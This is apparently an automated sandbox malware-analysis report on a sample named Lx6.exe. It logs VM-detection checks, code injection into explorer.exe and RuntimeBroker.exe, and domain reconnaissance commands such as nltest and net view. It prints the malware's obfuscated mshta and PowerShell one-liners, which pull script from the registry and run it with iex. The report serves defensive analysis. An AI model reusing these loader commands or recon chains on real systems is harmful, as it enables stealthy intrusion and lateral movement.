Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9749 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5459
Queries the current domain controller via net
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\Lx6.exe API coverage: 8.0 %
Source: C:\Windows\SysWOW64\cmd.exe API coverage: 3.7 %
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Domain FROM Win32_ComputerSystem
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jxpjpfgv.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\iyr5jfx4.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vupj0yhs.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\msihj3zd.dll Jump to dropped file
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_00768664 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 0_2_00768664
Source: explorer.exe, 0000000E.00000000.482443266.000000000834F000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000006
Source: explorer.exe, 0000000E.00000000.482233541.000000000830B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 0000000E.00000000.536033895.00000000059F0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
Source: explorer.exe, 0000000E.00000000.482633151.0000000008394000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: driverquery.exe, 0000003B.00000003.751303070.0000022034DAC000.00000004.00000020.00020000.00000000.sdmp, driverquery.exe, 0000003B.00000002.754257472.0000022034DAC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Microsoft Hyper-V Storage Accelerator
Source: RuntimeBroker.exe, 0000001F.00000000.642513702.0000014899851000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: driverquery.exe, 0000003B.00000003.751303070.0000022034DAC000.00000004.00000020.00020000.00000000.sdmp, driverquery.exe, 0000003B.00000002.754257472.0000022034DAC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Win32_SystemDriverstorfltWin32_SystemDriverWin32_ComputerSystem374653StoppedOKstorfltstorfltstorfltKernel DriverManualNormalC:\Windows\system32\drivers\vmstorfl.sysMicrosoft Hyper-V Storage AcceleratorMicrosoft Hyper-V Storage AcceleratorMicrosoft Hyper-V Storage Accelerator
Source: 9AF9.bin1.20.dr Binary or memory string: gencounter Microsoft Hyper-V Gene Kernel
Source: 9AF9.bin1.20.dr Binary or memory string: vmgid Microsoft Hyper-V Gues Kernel
Source: explorer.exe, 0000000E.00000000.521152311.000000000CDEC000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: _VMware_SATA_CD00#5&
Source: 9AF9.bin1.20.dr Binary or memory string: bttflt Microsoft Hyper-V VHDP Kernel
Source: 9AF9.bin1.20.dr Binary or memory string: vpci Microsoft Hyper-V Virt Kernel
Source: explorer.exe, 0000000E.00000000.482233541.000000000830B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000000
Source: driverquery.exe, 0000003B.00000003.751303070.0000022034DAC000.00000004.00000020.00020000.00000000.sdmp, driverquery.exe, 0000003B.00000002.754257472.0000022034DAC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Microsoft Hyper-V Guest Infrastructure Driver
Source: driverquery.exe, 0000003B.00000003.751303070.0000022034DAC000.00000004.00000020.00020000.00000000.sdmp, driverquery.exe, 0000003B.00000002.754257472.0000022034DAC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Win32_SystemDrivervmgidWin32_SystemDriverWin32_ComputerSystem374653StoppedOKvmgidvmgidvmgidKernel DriverManualNormalC:\Windows\system32\drivers\vmgid.sysMicrosoft Hyper-V Guest Infrastructure DriverMicrosoft Hyper-V Guest Infrastructure DriverMicrosoft Hyper-V Guest Infrastructure Driver
Source: explorer.exe, 0000000E.00000000.484259706.00000000085A9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 9AF9.bin1.20.dr Binary or memory string: storflt Microsoft Hyper-V Stor Kernel
Source: 9AF9.bin1.20.dr Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: RuntimeBroker.exe, 0000001B.00000000.604758910.000001D021800000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:H
Source: C:\Users\user\Desktop\Lx6.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_00752299 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 0_2_00752299
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_00761577 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 0_2_00761577
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_0075154D FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 0_2_0075154D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 35_2_03022299 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 35_2_03022299
Source: C:\Windows\SysWOW64\cmd.exe Code function: 35_2_0302154D FindFirstFileW,FindNextFileW,FindClose,FreeLibrary, 35_2_0302154D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 35_2_03031577 memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose, 35_2_03031577
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_00401000 LoadLibraryA,GetProcAddress, 0_2_00401000
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_0075D977 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 0_2_0075D977
Source: C:\Windows\SysWOW64\cmd.exe Code function: 35_2_0302D977 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 35_2_0302D977

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: apnfy.msn.com
Source: C:\Windows\explorer.exe Domain query: www.msn.com
Maps a DLL or memory area into another process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\cmd.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: unknown target: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe protection: execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe protection: execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: unknown target: C:\Windows\System32\cmd.exe protection: execute and read and write
Allocates memory in foreign processes
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2240CB00000 protect: page execute and read and write Jump to behavior
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1D023B80000 protect: page execute and read and write Jump to behavior
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 148997F0000 protect: page execute and read and write Jump to behavior
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\SysWOW64\cmd.exe base: D00000 protect: page execute and read and write Jump to behavior
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\cmd.exe base: 1CEDB0F0000 protect: page execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Memory allocated: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe base: 1FA9D410000 protect: page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Memory allocated: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe base: 1AF8B460000 protect: page execute and read and write
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 9ABD1580 Jump to behavior
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 9ABD1580 Jump to behavior
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 9ABD1580 Jump to behavior
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 9ABD1580 Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\Desktop\Lx6.exe Memory written: C:\Windows\System32\control.exe base: 7FF712EA12E0 Jump to behavior
Source: C:\Users\user\Desktop\Lx6.exe Memory written: C:\Windows\System32\control.exe base: 7FF712EA12E0 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 6C6000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FF89ABD1580 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 27C0000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FF89ABD1580 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 9BF5850000 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF89ABD1580 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2240CB00000 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF89ABD1580 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 9FF00FB000 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF89ABD1580 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D023B80000 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF89ABD1580 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: E1A059000 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF89ABD1580 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 148997F0000 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF89ABD1580 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: DA6FC0 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: D00000 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: DA6FC0 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\cmd.exe base: 7FF632277380 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\cmd.exe base: 1CEDB0F0000 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\cmd.exe base: 7FF632277380 Jump to behavior
Source: C:\Windows\System32\cmd.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 7FF635983220
Source: C:\Windows\System32\cmd.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 191D1E60000
Source: C:\Windows\System32\cmd.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 7FF635983220
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe base: 7FF70751E240
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe base: 19932670000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe base: 7FF70751E240
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe base: 7FF70751E240
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe base: 24EF3D30000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe base: 7FF70751E240
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe base: 7FF77B174A10
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe base: 1FA9D410000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe base: 7FF77B174A10
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe base: 7FF77B174A10
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe base: 1AF8B460000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe base: 7FF77B174A10
Changes memory attributes in foreign processes to executable or writable
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF89ABD1580 protect: page execute and read and write Jump to behavior
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF89ABD1580 protect: page execute read Jump to behavior
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF89ABD1580 protect: page execute and read and write Jump to behavior
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF89ABD1580 protect: page execute read Jump to behavior
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF89ABD1580 protect: page execute and read and write Jump to behavior
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF89ABD1580 protect: page execute read Jump to behavior
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3528 base: 6C6000 value: 00 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3528 base: 7FF89ABD1580 value: EB Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3528 base: 27C0000 value: 80 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3528 base: 7FF89ABD1580 value: 40 Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3528 Jump to behavior
Source: C:\Windows\explorer.exe Thread register set: target process: 3124 Jump to behavior
Source: C:\Windows\explorer.exe Thread register set: target process: 4372 Jump to behavior
Source: C:\Windows\explorer.exe Thread register set: target process: 4552 Jump to behavior
Source: C:\Windows\explorer.exe Thread register set: target process: 5832 Jump to behavior
Source: C:\Windows\explorer.exe Thread register set: target process: 1920 Jump to behavior
Source: C:\Windows\System32\cmd.exe Thread register set: target process: 6064
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 5836
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3536
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Thread register set: target process: 1716
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Thread register set: target process: 5240
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe c:\windows\system32\mshta.exe" "about:<hta:application><script>ccqf='wscript.shell';resizeto(0,2);eval(new activexobject(ccqf).regread('hkcu\\\software\\appdatalow\\software\\microsoft\\54e80703-a337-a6b8-cdc8-873a517cab0e\\\testlocal'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" new-alias -name wslluui -value gp; new-alias -name gwhuthvwu -value iex; gwhuthvwu ([system.text.encoding]::ascii.getstring((wslluui "hkcu:software\appdatalow\software\microsoft\54e80703-a337-a6b8-cdc8-873a517cab0e").urlsreturn))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" new-alias -name wslluui -value gp; new-alias -name gwhuthvwu -value iex; gwhuthvwu ([system.text.encoding]::ascii.getstring((wslluui "hkcu:software\appdatalow\software\microsoft\54e80703-a337-a6b8-cdc8-873a517cab0e").urlsreturn)) Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Lx6.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wslluui -value gp; new-alias -name gwhuthvwu -value iex; gwhuthvwu ([System.Text.Encoding]::ASCII.GetString((wslluui "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iyr5jfx4.cmdline Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jxpjpfgv.cmdline Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA4F5.tmp" "c:\Users\user\AppData\Local\Temp\CSCAB583CA567BD44E39E9932B1B4F9F8AB.TMP" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB08E.tmp" "c:\Users\user\AppData\Local\Temp\CSCF2AAFAB6410F41F998231914A7D0E24.TMP" Jump to behavior
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\more.com more
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep unrestricted -file C:\Users\user\TestLocal.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\msihj3zd.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vupj0yhs.cmdline
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup 127.0.0.1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist.exe /SVC
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\driverquery.exe driverquery.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFA7A.tmp" "c:\Users\user\AppData\Local\Temp\CSCABF4CE5BBE3740BAB8B4C0CFADC5BA2E.TMP"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net config workstation
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES501C.tmp" "c:\Users\user\AppData\Local\Temp\CSCB1F306A019E148659D5DB92DA08A3D35.TMP"
Source: explorer.exe, 0000000E.00000000.462507554.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.508193796.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.530473355.0000000000E50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: EProgram Managerzx
Source: explorer.exe, 0000000E.00000000.542446129.000000000834F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.518351829.000000000834F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.462507554.0000000000E50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000E.00000000.462507554.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.508193796.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.530473355.0000000000E50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 0000000E.00000000.501749346.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.530080768.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.459146583.00000000009C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Progmanath
Source: explorer.exe, 0000000E.00000000.462507554.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.508193796.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.530473355.0000000000E50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\Lx6.exe Code function: NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 0_2_00401673
Queries the volume information (name, serial number etc) of a device
